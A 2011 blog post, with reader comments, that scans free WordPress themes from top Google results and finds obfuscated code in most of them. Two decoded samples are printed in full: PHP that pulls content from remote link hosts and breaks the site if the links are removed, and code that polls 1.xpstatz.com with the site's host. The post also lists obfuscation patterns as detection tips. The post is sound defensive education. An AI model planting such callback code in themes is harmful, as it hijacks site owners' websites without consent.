Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else

January 11, 2011 | By Siobhan McKeown
523 Comments

Update: I have written a post about where you can find free WordPress themes. So once you get to the end of this and are suitably concerned you can check it out for some great places to find your themes.

A few months ago I wrote about WordPress Security. Now, armed only with the words “free WordPress themes,” builtBackwards’ Theme Authenticity Checker Plugin and Donncha O Caoimh’s Exploit Scanner, I’m going to take a look through the first page of Google to see just how safe pages ranking for “Free WordPress Themes” are.

Note: I am not uploading any of these themes onto my server. Instead I have installed xampp and am running WordPress locally on my computer. I don’t advise uploading themes from random websites directly onto your server – you never know what you could catch! There are some nasty diseases out there…..

screenshot of google search for "free wordpress themes"

1. WordPressThemesBase

WordPress Themes Base is in the lucky position of being the top ranking site for “Free WordPress Themes.” Someone’s been working hard on their SEO! The blurb at the bottom tells the visitor that unlike other sites offering free WordPress themes, the themes at WordPress Themes Base are fresh. Great, there’s nothing better than a fresh theme.

I downloaded Prinz Branford Magazine. Already things are looking problematic. Branford Magazine is a theme released by der Prinz. There is a very old version of the theme which (as far as I can tell) isn’t up-to-date with WordPress 3.0 and a Pro was released earlier this year. That means we’re looking at either a theme that doesn’t work properly with WP 3.0 or a theme that is a knock-off of a pro.

First thing’s first – install the theme and run it through TAC.

Screenshot of Branford MAgazine TAC

Encrypted code found! First site on Google and we’ve already come across Base64 :( Poor me….. Base64 is often used to hide malicious code. I can see that the code is in the footer. Let’s take a look at that:

screenshot branford magazine footer

Yeah, copyright me, damned right! But what is that Base64 hiding. Here it is in the footer code:

screenshot of branford base64 Lots of blah.

You can decode this base64 code in two ways :

You can try Otto’s decoder – handy!
You can also do it manually – this involves changing the eval() to an echo() to force whatever’s been hidden out of hiding. This post will walk you through the process.

I’ve gone for option 2. Turning my eval() into an echo() produced this result in my footer:

screenshot of decoded branford magazine footer

Eh? A minute ago it said copyright me!!! Bah! Now there’s something about Free Anti-Virus Downloads. Where did that come from? Hidden by the base64 methinks.

The Verdict:

I downloaded another 2 themes from this site and they all contained base64 code. Base 64 does not necessarily just hide links. It can also hide malicious code which can run amok on your site. Not only that but the site, while maintaining that its themes are fresh, is pushing themes built by other designers that the site owner has put base64 code into. I contacted Michael Oeser at der Prinz, who told me that he’s been trying to get in touch with the site about removing the theme but is having no luck. He’s posted a warning on his own blog about the dangers of downloading pirate themes. He’s the designer of Branford Magazine and his advice is to stay well away from sites like this – good advice!

My suggestion:

Avoid!

2. Free WordPress Themes

Another site with free WordPress themes. Great! Just what I need. I’m always after a good freebie. The first theme on the site is called BeautyStore. I like beauty stores so I’ll download that. Get it installed and run it through TAC.

screenshot of beauty store tac

More encrypted code!!!

Here it is in the footer:

screenshot of beauty store footer

For a beauty store it’s not all that beautiful. There are all sorts of encoded functions right in the footer. This time when I turned my eval()s into echo()s I couldn’t get anything to appear. I ran it through a few decoders and it’s far too jumbled up for me :(

Exploit scanner dislikes it as much as I do:

screenshot of beauty store exploit scanner

All of these came up as severe warnings.

The Verdict

2nd site on Google and we’re getting more base64. I downloaded a few other themes which contained static links and no base64. I guess that this site is a bit hit and miss. However, with the previous site I could get it decoded and this, no go. A search on some forums for the pieces of code in the footer indicate that it may be encrypted code used for hacking :( I ain’t techie enough to know and I suspect that most WordPress users aren’t either. In that case….

My Suggestion

Avoid!

3. Themes2WP

Scanning through the themes on Themes2WP they’ve certainly got some tempting ones on there. Let’s take a look at Gameliso which looks like a nicely designed magazine theme.

screenshot of gameliso tac Theme Authenticity Checker says that it has found 5 static links. Static links are okay, right? A developer’s got to link back to their site. Here are the links:

screenshot of gameliso static links

Hmmmmm… I don’t know about you, but I don’t know if singles sites and animal care sites have much to do with theme development. Let’s take a closer look at the code in footer.php:

screenshot of gameliso code

There are the links, with the helpful message: “Please do not edit following code, it may cause your site to stop working.” What useful information!!!! I would’ve gone and removed the links and broken the whole thing. Phew.

Oh wait… I did remove them and the site still seems to be working.

There’s another link in sidebar.php. Here it is:

Now to check out the styles for ad_lnk:

screenshot of gameliso css
Wow! That’s a link that’s way out in the middle of nowhere. Can’t be for much except back-linking programmes.

So we’ve checked out the links – let’s run exploit scanner.

screenshot of gameliso exploit scanner Gameliso is picked up as containing an eval () which could be used to execute malicious code. It’s not the type of thing that you want to have showing up in your theme.

The Verdict

Nice themes but contain 5 backlinks to random people who you probably aren’t interested in linking to. It goes so far as to tell you that if you remove the links your theme won’t work. Of course, we know that this isn’t true – but a beginner WordPress user might think twice about removing them. As for the eval function, well it could be harmless but I don’t know enough about javascript (probably like many average WordPress users) to tell you if in this case it is or it isn’t.

My suggestion

Avoid!

4. FreeWPThemes

After assuming that all sites that aren’t WordPress.org are bad, I was surprised to find no odd embedded links in any of the themes that I downloaded from FreeWPThemes. I downloaded 5 themes, from across the site. And they all had the same links:

screenshot of programme tac None of these appear at all out of place. So, I felt a bit bad about my assumptions.

However, I did run the themes against the Theme Check Plugin. The plugin tests your theme to make sure it’s up to the latest theme review standards. Here’s how the Programme theme did:

screenshot of programme theme check

Lots of errors! There’s even more than that but I couldn’t fit them all into the screenshot.

The Verdict

While the themes from FreeWPThemes might not live up to the exacting standards of the WordPress theme directory, there is nothing malicious about them, nor is there any backlinks. It may be that you come across things that aren’t working in quite the way that you want them to but there’s nothing hidden or evil about them!

My suggestion

Okay to use but check to make sure all of the functionality that you need is working.

5. WordPress.org

Finally! WordPress.org! We all know and love WordPress.org. It is the safest place to go to get your themes. I guess the problem that we all have with the theme repository is that many of the themes look like they were made back in the 1600s (or near enough). This can be frustrating, especially when many of them don’t work too well with WordPress 3.0. At the bottom of this post I’ll list some other safe places that are great for themes.

The Verdict

A totally trusted and safe place to get your free WordPress themes from.

My suggestion

6. Themes.Rock Kitty

This site has a picture of a cat playing a guitar. I am easily pleased by things with cats on them. The first theme that I downloaded had no advertising links or hidden code in it, nor did the second. But the third came up with this:

screenshot of funda tac

More Base64!

This time changing my eval()s to echo()s produced this message:

The links at the bottom of the theme appear like this:

Exploit scanner came up with 17 severe warnings for this theme. Since there are only 4 links showing at the bottom I think we can assume that this theme is either packed full of hidden backlinks or there is something else going on.

The Verdict

Use this site very carefully. If you are going to download themes from them install the themes on your local machine and check them out first. This is another site where you could end up downloading a theme that hijacks your site. Be careful!

My suggestion

Avoid!

7. WP Themes Depot

Another website offering the most up-to-date, fresh, beautiful, free WordPress themes. This time I downloaded the most popular theme on the site, Niferiti, downloaded 980 times. Once again I ran it through TAC and came up with encrypted code:

screenshot of niferiti tac

After changing the eval() to an echo() I got this message (again):

Someone obviously doesn’t want me to get rid of the code. The links appear in the footer like so:

It feels a bit disingenuous to me to say that these are links from family and friends. Especially since we’ve seen that message before with different links. But I guess it’s possible that all spammy links come from the same family…… just maybe….. right?

Update: Okay, so I mustn’t have been paying attention to that message. I = doofus! Once again a lesson in reading things properly. In any case, links, whether family friendly or not, should not be hidden using encrypted code that is often used to mask other activity.

The Verdict

Another site with Base64 in the code. I guess I don’t have to repeat how untrustworthy code like this is. While it’s one thing for a developer to include banklinks it’s another when they use base64 to encode the links. Especially when it’s well known that the code is used to hide malware.

My suggestion

Avoid!

8. WPRex

I downloaded 5 themes from WPRex, the first two contained static spammy links and three others contained (surprise surprise) base64.

screenshot of pink desire tac

That’s Pink Desire. This time to decode it I used this decoder.

Here’s what it spat out:

screenshot of pink desire decoded More encrypted links. People do go to quite some lengths to hide their links!

The Verdict

Another site that is a bit hit and miss. If you must download themes from a place like this make sure you check out what it is you have by using something like TAC. You can also use some of the decoder tools I’ll list at the bottom to check out what any base64 is hiding.

My suggestion

Avoid!

9. No Limits Web Design

While this website has a slightly different name to all of the rest making me hope for something different, upon landing it has the similar announcement about all its great free WordPress themes. I downloaded one of the featured themes – Dark Night – and yet again found more base64 in the theme.

screenshot of darknight tac

As well as the base64 I found a piece of code starting eval(str_rot13(. You can decode that here.

I got these results:

screenshot of darknight str That’s basically the license. However, when I turned the eval to an echo this code appeared at the top of the page:

function wp_code() { $default_link_text = "Default"; $link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php"; $link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php"; $l = ""; foreach($link_host as $value) { if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) { while (!feof ($file)) { $line = fgets ($file); $l .= $line; } fclose($file); break; } else { if ($value == end($link_host)) { $l=$default_link_text; } } } return $l; } function check_wp_code_sidebar() { $uri = strtolower($_SERVER["REQUEST_URI"]); if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) { } else { $l=""; $f = dirname(__file__) . "/sidebar.php"; $fd = fopen($f, "r"); $c = fread($fd, filesize($f)); fclose($fd); if (strpos($c, $l) == 0) { die; } } } check_wp_code_sidebar();

I got one of our lovely Incsubbers to take a look at it and he translated it as:

function wp_code() {
		$default_link_text = "Default";
		$link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php";
		$link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php";
		$l = "";
		foreach($link_host as $value) {
			if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) {
				while (!feof ($file)) {
					$line = fgets ($file);
					$l .= $line;
				}
				fclose($file);
				break;
			} else {
				if ($value == end($link_host)) {
					$l=$default_link_text;
				}
			}
		}
		return $l;
	} 
	function check_wp_code_sidebar() {
		$uri = strtolower($_SERVER["REQUEST_URI"]);
		if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) {
		} else {
			$l="";
			$f = dirname(__file__) . "/sidebar.php";
			$fd = fopen($f, "r");
			$c = fread($fd, filesize($f));
			fclose($fd);
			if (strpos($c, $l) == 0) { die; }
		}
	} 
	check_wp_code_sidebar();

The theme is pulling urls into the sidebar, if they don’t appear then die. Poor site :(

Here’s what exploit scanner has to say:

The Verdict

Another site using base64, another one to stay out of the way of. This one is even more encrypted than the others, which ended up showing much more quickly what they are up to.

My suggestion

Avoid!

Phew… getting to the end now… this is exhausting!

10. Templates Browser

Nearly at the end! Actually I did a little search about Templates Browser and found this post. So we can already guess what’s going to happen here. I downloaded the Dropshadow theme, which is actually by Brian Gardner but which you can no longer get from his site (probably because it’s pretty old and not WP 3.0 compatible). Although the TAC only found static links like so:

Screenshot of dropshadow tac

The static link in the footer is a huge piece of PHP. The source code of the site reveals that it is calling a link to a casino site. However, it has some write elements which make me more suspicious. I got my friendly Incsubber to partially decode it:

1.	get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_code'");
3.	$l_code = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'");
4.
5.	if (empty($l_time_code)) {
6.	        $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')");
7.	        $new_time_code = 0;
8.	} else
9.	        $new_time_code = intval($l_time_code[0]);
10.
11.	if (empty($l_code)) {
12.	        $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_code', '
', 'no')");
13.	        $new_l_code = '
';
14.	} else $new_l_code = $l_code[0];
15.
16.	if ( ( time() - $new_time_code ) >= 60 ) {
17.	        $R39C188653EA53DBD6E3F1D3915EDAC0C = "com";
18.	        $R8088818E3E46A17C12F2EE42EB12D7AC = "1.";
19.	        $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";
20.	        $xps = "xps.";
21.	        $url = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";
22.	        $page = "/".$xps."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);
23.
24.	        //1.xpstatz.com/xps.php?h=host&u=uri
25.
26.	        if (ini_get('allow_url_fopen')) {
27.	                $new_l_code = @file_get_contents("http://" . $url . $page);
28.	        }
29.	        else {
30.	                $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($url, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);
31.
32.	                if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {
33.	                        @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);
34.	                        @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $page HTTP/1.1\r\n");
35.	                        @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $url\r\n");
36.	                        @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");
37.	                        $new_l_code = "";
38.	                        while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {
39.	                                $new_l_code .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);
40.	                        }
41.	                        $new_l_code = trim(strstr($new_l_code, "\r\n\r\n"));
42.	                }
43.	                @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
44.	        }
45.	        if ( strpos($new_l_code, '[/]') ) {
46.	                $new_time_code = time();
47.	                $R54997E66281827CBC285597040554FCC = mysql_escape_string($new_l_code);
48.	                $wpdb->query("UPDATE $wpdb->options SET option_value=$new_time_code WHERE option_name='l_time_code'");     $wpdb->query("UPDATE $wpdb->options SET option_value='$R54997E66281827CBC285597040554FCC' WHERE option_name='l_code'");
49.	}
50.
51.	}
52.	if ( strpos($new_l_code, '[/]') ) {
53.	        $R3CB9CDAED257453CFA56B9EF81B44C57 = strpos($new_l_code, '[]') + 2;
54.	        $R24D59CD0B76A27B85F35D40A3CF6EC37 = strrpos($new_l_code, '[/]');
55.	        echo substr($new_l_code, $R3CB9CDAED257453CFA56B9EF81B44C57, $R24D59CD0B76A27B85F35D40A3CF6EC37-$R3CB9CDAED257453CFA56B9EF81B44C57);
56.	        $RE762F29BDD39FF0A2ADF9AF4E6885799 = 1;
57.	}
58.	?>

Doesn’t mean a whole lot to me either….

But it stores the links in wp_options and checks every 60 seconds to grab the code from an external site. Then it updates the timecodes and links in the options table before outputting them in the footer.

Basically a much more complex method of doing everything that we’ve seen already.

The Verdict

Things are already looking suspicious when another site is claiming that Templates Browser contains malware. And even more suspicious when they’re hawking an old theme which has been designed by an established WordPress designer. All of that code in the footer is not good, and is another way of taking control of your site.

My suggestion

Avoid!

Here’s a video from ThemeLab which does what I did, but quicker!

Conclusion

Out of the ten sites on the first page of Google, here are the stats:

Safe: 1
Iffy: 1
Avoid: 8

8 out of 10 sites included base64 encoding in their themes. The average WordPress user no doubt knows that Google isn’t the best place to find themes but the stats on these sites show that there are thousands of people downloading them and using them on their websites. Someone who has come to WordPress on the first time is more than likely to type “free WordPress themes” into Google to find a site that gives them what they want. Unfortunately they’re more than likely to end up with spammy links, at best, on their site.

Of course, the WordPress Theme Directory can be frustrating in its lack of themes that work with WordPress 3.0. Many of the themes look a little out of date and lots look very bloggy. Here are some trusted sites where you can find free WordPress themes.

Free Themes

Premium Sites with some Free WordPress Themes

There are plenty more so look around! Don’t type free WordPress themes into Google though!

Tip: A legitimate site offering free WordPress themes will not have the word “WordPress” in its url. WordPress is trademarked and if a site is going to violate trademarks it’s likely to be unscrupulous about inserting spam and other code into themes. Here’s what WordPress have to say about it. (thanks to Jim - see comments below – for correcting me on that!!!!)

Decoders

If you are investigating a theme that you think is suspicious you might find the following decoding tools helpful (source):

$o= Otto’s decoder
$_F=__FILE__:
eval(gzinflate(base64_decode('...')));:
eval(str_rot13(' ... '));
Other codes
Manual base64 decode

Useful Plugins

Reply

Hi Siobhan, thank you so much for this post. It’s something I tell clients all the time and also teach in my workshops. But taking the time to pull these samples and testing them, that’s awesome. I will certainly be sharing this post!

Bob Dunn January 11, 2011 at 10:22 am
Reply

The working decoders we know of can be found here: http://wordpress.org/support/topic/how-to-decrypt-an-encoded-theme

I update that post from time to time when I either find a good decoder or write one. :)

Otto January 11, 2011 at 10:23 am
Pingback: WordPress free themes
Pingback: Tweets that mention Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else - WordPress, Multisite and BuddyPress plugins, themes, news and help – WPMU.org -- Topsy.com
Reply

Are you serious? This is one of the worst articles I’ve ever read on wpmu.org. I don’t even know where to begin, so I’ll start with one of the last things I bothered to read before deciding there was no real point in going on.

“It feels a bit disingenuous to me to say that these are links from family and friends. Especially since we’ve seen that message before with different links.”

Let’s not worry with the sentence structure and go right to the assumption made here that ‘family friendly’ would mean these are links from family and friends. Um. Here’s a link that maybe will clear that up a little: http://en.wikipedia.org/wiki/Family-friendly

So now that we’re past that little(?) bit of confusion, I’m right back to asking, “What the heck?!”

Yes, using eval to mask the links that you stuff into a theme is… lame. Yes, doing so in such a way that disables a theme if they are removed (and while one or more you checked didn’t work this way, there are several that do) is also lame. This doesn’t, however, mean anything malicious is necessarily going on.

Despite maligning a number of sites as being bad places for no particularly good reason, however, there were some good points. The eval() function can be used maliciously and if you don’t know how to work out what is and isn’t malicious it might be worth your while to be wary. Second, it’s horrible when people steal others themes, call them their own and then stuff them full of affiliate or back links, hidden or otherwise, for their own gain.

A few good points, but overall a shoddy article all in all.

Jay Drake January 11, 2011 at 10:40 am
Pingback: Где не стоит искать бесплатные темы для Вордпресса « Блог Golan
Reply

One should be watching out for links without an anchor text. Those are the trickier ones to find :)

Nabil January 11, 2011 at 11:06 am
Reply

Thank you for your great work!!
So much time you spent on this research and screenshots.
I always knew these themes are not safe, but never expected 9 of 10 sites from SERP…….. I’m in shock.
Gave a link to this article in my blog.
Respect!

Golan January 11, 2011 at 11:06 am
Reply

Thanks for your comments all.

Jay, yes you’re right, I totally mis-read that – obviously no excuse at all for it. But I’ve updated the article to account for your comment.

However, I did make the point a few times that there is not necessarily anything malicious going on. The point is that the average WordPress user will be unable to discern whether a base64 is being used to hide links or whether it is being used for something more malicious. To avoid picking up any malware I strongly suggest avoiding sites that use base64 encryption or eval() functions, altogether.

I’m sorry if you feel that I have maligned some good sites but I could never suggest that any of our readers download themes from sites that use encrypted code in their themes – that was 8 out of 10 websites that I tested.

Siobhan Ambrose January 11, 2011 at 12:10 pm
Reply

Woah !! Lot of effort gone into this post. Thank You for sharing the results. I ‘only buy’ premium WordPress themes from Woo, StudioPress, Templatic & Themeforest. This post will enlighten those freebie seekers.

Prashant January 11, 2011 at 12:52 pm
Reply

Wow! So much information, it is overwhelming. And yet, so important to the newbie WordPress user.

I learned the perils of free themes when I first starting working with WordPress. It took me forever to get rid of the corrupt code, but it was a valuable lesson. Just like in life, most good things don’t come free. WordPress themes are no different. If you can’t afford to pay for a premium WordPress theme, plan on cleaning up your free theme.

In addition to your above list, I’d recommend ThemeForest.net. While not all theme designers provide solid themes and good support, Theme Forest has some rock stars and it is my first stop when seeking themes. Themes only cost about $30 and to me the quality and excellent support is priceless.

Rebecca Gill January 11, 2011 at 1:01 pm
Pingback: Mire figyelj WordPress-témák beszerzésénél? | élet és könyvtár
Reply

Hell of a marketing to the poor sites.
No wonder MediaTemple servers get so often unconsciously infected.

Ranking high such sites and alike, makes me have second thoughts about Google’s “Don’ be evil!” slogan.

Great research Siobhan.

Arian Xhezairi January 11, 2011 at 2:23 pm
Reply

This is a great post and highlights some of the problems Theme Jump (a small but growing theme directory) has been trying to solve. Hopefully more WP theme directories will start to pop up this year to help alleviate this issue.

Nick January 11, 2011 at 2:29 pm
Reply

I was doing a search for restaurant themes. I didn’t even include “free” in my search. A drive-by virus tried to infect my system.

Pat Douglas January 11, 2011 at 3:44 pm
Reply

Wow! I always new free themes were suspect, but never had any idea so many of them were that dangerous. Thanks for showing us how to check for the bad stuff.

Frank January 11, 2011 at 3:52 pm
Reply

Thanks for sharing this excellent tips with us. A every wordpress beginner should read this. When I was starting out, I used to collet free wordpress themes so that I can use them in my work. I would like to share an experience here regarding this free wordpress themes.

I’ve kept the free wordpress themes which I downloaded from wordpressthemebase in a separate folder of my pc. One fine day, my antivirus system gives a warning about a particular php code which contains within one of the theme that it’s infected with virus & need to be deleted immediately. I quickly deleted that particular one theme.

And the very next thing happened is I’m getting the same warning message until I delete the entire folder which contains all the free themes & my warning was still showing me until I empitied the recyclye bin. The warning shows me that a particular php code which contains within the theme is a suspicious spyware or malware.. I’m sharing this story here because I don’t want any of you to go through this very same trouble in trying out this free themes.

Excellent work guys! Keep up the good work!

Nithiyaah January 11, 2011 at 4:48 pm
Reply

Really useful post; surprised me a little to see so much bad code in those themes! Was good to learn some new tricks at digging a little deeper into the code as well; especially about decoding! :)

DSPICKETT January 11, 2011 at 5:02 pm
Reply

You could also check out this great post for 100 top quality free WordPress themes: http://www.smashingmagazine.com/2010/08/19/100-free-high-quality-wordpress-themes-for-2010/

Siobhan Ambrose January 11, 2011 at 5:50 pm
Pingback: Why you should never search for free Wordpress themes in Google or anywhere else.
Reply

Great Article!
I’ve been telling people till I’m blue in the face that some free themes have riddled with junk and cheap ass noobs refuse to believe me.

Nice job on this one.
I’m linking to it from everywhere. Everyone that uses WordPress needs to read this.

Harold Mansfield January 11, 2011 at 6:17 pm
Reply

Great article, Siobhan, and thanks for linking to my related post.

It would appear that you struck a chord with Jay Drake. Unfortunately for Jay, I agree with you completely. The Themes on every single one of these sites that add encoding (or worse) are outright crap. They’re not kept updated with current WordPress standards and features; they’re coded terribly, and most of them are ripped from legitimate Themes. Their entire raison d’etre is to push SEO/spam links. I guess Jay is okay with that; well, I’m not.

WordPress users should absolutely avoid these sites.

Chip Bennett January 11, 2011 at 6:20 pm
Pingback: Free WordPress Theme Warning
Pingback: Avoid Themes That Have Evil Codes
Reply

Very nice article!
I think it is very important to use an anti-virus plug-in for WordPress. Even if you are using some free wp plugins.

Andreas January 12, 2011 at 4:01 am
Pingback: Kostenlose WordPress Themes - eine sichere Sache? - Themes, Google, WordPress, Free, Never, Search, Anywhere, Else - moodWay
Reply

@Shioban, @Chip: Agreed a 100%. Great article, very enlighting and useful, and not only for the average WP user. Believe it or not, I create freelancer sites with WordPress and had no idea about base64 encoding.

Furthermore, I’d like to suggest this article could be the opener to another discussion framed by the question: What to expect when stuff is being labeled “free”?
I sure don’t mean to philosophize all over you, but isn’t it worth a second thought that most likely the more or less uninformed folks hunting for a “free” theme will fall prey to base64 tricks, while those who invest in learning a bit about WordPress and themes in the first place (which could be seen as nothing else but paying a price in real life-time hours of learning) more likely will avoid the headaches of a base64-hijacked site and ultimately have a greater experience with the product.
So, does the belief in getting something for “free”—that is: without giving anything in return— work in the end? Doesn’t seem so, does it?
Even if it’s life-time hours instead of dollars: the willingness to pay *some* kind of a price obviously makes a dot in the deviding line between the happy and the unhappy… eh …WordPress users. ;-)

Caspar January 12, 2011 at 4:13 am
Reply

The ugliest free WordPress themes are those that infect Word Press with viruses (for example: long code at the end of footer.php). I would rather pay for high-quality themes or frameworks.

Frank January 12, 2011 at 4:34 am
Reply

Oh dear. Thanks for this post – it clearly approves my own experiences with searching for free templates on google. Recently I searched one for a new company and was also willing to pay for a premium theme – finally I pulled one from freewordpressthemes4u.com as I had very specific ideas what it should look like, and one of them fitted perfectly – so I thought. I installed and just wanted to slidely change the appereance – but hell, what a code! All of the contents where pulled from separate files, I worked about an hour in order just to find the passages to change in the files. However, there was so much code that I decided to have a break and check if the theme really is valid code – hell. The W3C validator just told me about that there were plenty of errors – deprecated tags, undisclosed tags, and many more. The best of the story: they really want a donation of about 20 dollars in order to get the theme without sponsored links! What the hell – for this piece of crappy code I should pay?!
So I can also confirm: sometimes it’s really annoying to search for themes… :(

Timo January 12, 2011 at 5:20 am
Reply

Good to know about this.
But i never worked on wordpress theme stuff

Gaurav M January 12, 2011 at 5:21 am
Reply

Awesome work, really good to see the detail behind this. Have tweeted for you, you’ll get some decent traffic from my audience – many bloggers on WordPress. They’ll thank you for this – as do I.

James Mayes January 12, 2011 at 6:00 am
Reply

I’ve designed a few themes in the past. I’ll be honest, my themes were crap. But had my link in the footer that most people were nice enough to leave in.

I’ve been approached by unscrupulous SEO companies in the past – wanting to put their links in the footer for payment. I refused, so they just did it anyway & distributed it.

Here’s the kicker, even though they submitted it to sites, they left me as the owner. So I got a few angry support requests on why I’ve screwed up their site due to removing code like above. I told them that I’d nothing to do with that version, and told them to download my themes. :)

Rhys January 12, 2011 at 6:02 am
Reply

A fantastic resource, thank you for this. Tweeted!

Jennie January 12, 2011 at 6:10 am
Reply

GREAT post, I had NO IDEA that free themes had nasty encrypted codes in them! This has come as a real shock to me, which sounds a little naive, I know!

Thanks for taking the time to do this and it’s great to see a post that is a little bit more interesting then ’10 great wordpress themes’ which you see sprout up every now and again :)

Carly January 12, 2011 at 6:30 am
Pingback: Should you thank for Retweets? « Musings from Sussex
Reply

I have used one free theme so far rests are premium. the name of the theme is “SimpleFolio”, I wish if there were a code review for this as well. Now I’m in dilemma, should I remove or keep it, I had done a lot look & feel customization.

Thanks for the article.

Inspirations Unlimited January 12, 2011 at 6:35 am
Reply

Phew! Thanks for all of your comments and retweets guys! I’m glad you’re all finding it so useful and I hope it helps to put people off from downloading their themes from just anywhere that crops up on Google.

@Caspar You make an interesting point about things that are “free.” There are loads of themes that are free and reputable, you just shouldn’t use Google to look for them. Whenever I use a free them I always go straight to the source and always credit the designer. Many theme developers will release themes that have been pet projects. Others are released by commerical companies who want to either raise their profile or increase support memberships.

A lot of the themes that are being given away “for free” are released under the Creative Commons license, instead of GPL. This is contraversial in itself as WordPress, which a theme needs to run, is GPL.

It’s an interesting issue though and a great idea for another post. Are the best things in life (or WordPress anyway) free? There’s lots to be said about it so I think I’ll address it in a post next week :)

@Inspirations – SimpleFolio is a free theme that was released by the very reputable Smashing Magazine. If you downloaded it directly from them you shouldn’t have any problems. If you downloaded it from elsewhere then you might. If in doubt download the TAC plugin and check it out: http://wordpress.org/extend/plugins/tac/

Siobhan Ambrose January 12, 2011 at 6:50 am
Reply

Thanks mate as a relative newcomer to the whole WP development scene I’m very appreciative of the heads up. Too much SEO and Spamware focused crap on the net for my liking.

Colin Harris January 12, 2011 at 6:57 am
Reply

By the way: When examining a theme or a plugin one should look for ‘strrev(“edoced_46esab”)’, too. The ‘strrev() function’ reverses a string: ‘edoced_46esab’ is ‘base64_decode’ the other way round. Spammers do this to hide encrypted code from common detection methods that focus on keywords like ‘base64_decode’. That’s my (bad) experience.

rp January 12, 2011 at 7:09 am
Reply

I have tweeted this post, it s very nice to see that in fact, most of the theme for wordpress is corrupted by this encode. If you decode and put off this code on the footer, is it clean?

rachat de crédit January 12, 2011 at 7:17 am
Reply

Why even use wordpress at all?
It’s a security nightmare and the really bad performance speaks for itself.

n January 12, 2011 at 7:19 am
Reply

Very nice post on wordpress. I wanted to write the same thing for french people cause i’ve seen the same thing when i explored the web

agence referencement lyon January 12, 2011 at 7:22 am
Pingback: Never Search For Free WordPress Themes - Monday By Noon
Reply

@n:

Pop quiz: name one in-the-wild exploited security vulnerability in WordPress.

(Do please try to constrain your reply to security vulnerabilities from the past year or two.)

Hurry; the clock’s ticking. Let’s see if you can prove that you’re not just spreading FUD.

Chip

Chip Bennett January 12, 2011 at 8:02 am
Reply

@n Why use WordPress at all? WordPress is only ever a security nightmare if people use it in the same way some people use a computer without a firewall or anti-virus. Any piece of software becomes less secure if people use it irresponsibly.

There are lots of simple steps that you can take to improve your WP security:
http://wpmu.org/wordpress-security-101-8-tips-tricks-and-tweaks-to-secure-your-wordpress-website/
http://www.smashingmagazine.com/2010/07/01/10-useful-wordpress-security-tweaks/

Downloading WordPress themes from random spammy websites is the equivalent of using Google to find a piece of software rather than going straight to the source.

Good security comes down to how WordPress is implemented by its users, not the platform itself.

Siobhan Ambrose January 12, 2011 at 8:03 am
Pingback: Tweets that mention Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else - WordPress, Multisite and BuddyPress plugins, themes, news and help – WPMU.org -- Topsy.com
Reply

A great article which will hopefully be re-tweeted by thousands to raise awareness of this problem. The more of this rubbish we can keep away from peoples WordPress installations the better lets hope we can raise awareness amongst those who are just discovering and using wordpress in anger.

Keep up the good work Siobhan :-)

Robert January 12, 2011 at 8:16 am
Reply

It’s not encrypted, it’s encoded. Big difference.

Martijn January 12, 2011 at 8:39 am
Pingback: Warum man nicht mit Google nach freien WordPress-Themes suchen sollte « Unser täglich Spam
Pingback: Netzwelt-Ticker: Google löscht populäre Video-Technik aus Browser | Flash News
Pingback: Why You Should Be Cautious about Free Wordpress Themes « Listen, Adapt, Do
Reply

@Siobhan Just to clarify: I hope it came across, I’m in no way against anything related to the open source idea and “free software” like WordPress! Looking forward to that post of yours. ;-)

Caspar January 12, 2011 at 11:31 am
Reply

Superb post. Interesting, informative and somewhat entertaining too. I’m shocked that almost everything on the first page of that Google search proved dodgy.

Darren January 12, 2011 at 11:57 am
Reply

How long did you spend doing this? I mean, holy CRAP! The sad thing is that it never dawned on me that themes could be malicious until I read this.

Burke January 12, 2011 at 11:57 am
Reply

Phew! Glad I got my theme directly from the guy who wrote it.

cymb January 12, 2011 at 12:08 pm
Pingback: Beware Of Free WordPress Themes On The Internet
Reply

Shouldn’t the verdict be safe: 2. Because although one theme site contained out of date themes there was nothing wrong with them.

Good article though. People should also scan their own themes once in a while. For example: my always up to date WP.ORG installation has been infected 2 times in the last year with base64 encoded malicious code infecting visitors!

Roy January 12, 2011 at 12:34 pm
Reply

Great article, the exact reason why I use Studio Press for my wordpress sites… I retweeted this on Twitter, so hopefully other Wp users will be informed too.

Cuteek January 12, 2011 at 12:53 pm
Reply

amazing post! i love the amount of research you’ve done on each site. i would’ve never known that these free themes contained anything malicious (poor innocent me!)
thanks for the info :)

tweet January 12, 2011 at 2:00 pm
Reply

Great job! But it’s not a news, don’t touch WP if you’re not a coder.

zhaiduo January 12, 2011 at 2:26 pm
Reply

Fascinating article. Thanks for the read. I knew some sites hide code in their themes and have come across it a couple of times before. I just didn’t know the extent of the problem.

Duncan January 12, 2011 at 2:58 pm
